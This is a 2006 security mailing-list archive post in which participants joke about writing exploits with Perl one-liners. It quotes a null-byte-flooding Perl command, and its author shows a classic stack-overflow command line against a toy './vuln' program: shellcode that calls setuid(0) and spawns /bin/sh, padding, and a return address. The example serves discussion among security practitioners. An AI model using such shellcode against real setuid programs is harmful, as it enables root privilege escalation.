Dailydave mailing list archives
Re: Google Security Team
From: "Ferguson, Justin (IARC)" <FergusonJ () nv doe gov>
Date: Thu, 28 Sep 2006 10:25:55 -0700
Thats so cool! I think this is a shining beacon! Forget abstraction, forget frameworks (sorry HD), forget C++,C .... Perl.
Well technically speaking it's all assembly eventually ;], just because you didn't write the C code that your script calls, doesn't make it really special (imho of course)
Well... This is not 100% true. Tavis used also Perl! ;-) Note the
following source line:
perl -e 'print "\x00"x"262144"' >&3
I guess I don't understand the big deal with this, this was the first thing I realized when writing my first exploit?? $ ./vuln `echo -e "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x6 2\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"``echo "AAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAAAAAA"``echo -e "\xfa\xff\xff\xbf"` (not all versions of echo accept the -e, nor do all of them require it) _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Google Security Team Rhys Kidd (Sep 27)
- Re: Google Security Team H D Moore (Sep 27)
- Re: Google Security Team Ian Melven (Sep 27)
- Re: Google Security Team Robert Clark (Sep 28)
- Re: Google Security Team Roman Medina-Heigl Hernandez (Sep 28)
- Re: Google Security Team Roman Medina-Heigl Hernandez (Sep 28)
- Re: Google Security Team str0ke (Sep 28)
- Re: Google Security Team Thomas Pollet (Sep 28)
- Re: Google Security Team H D Moore (Sep 27)
- <Possible follow-ups>
- Re: Google Security Team Steven M. Christey (Sep 27)
- Re: Google Security Team Ferguson, Justin (IARC) (Sep 28)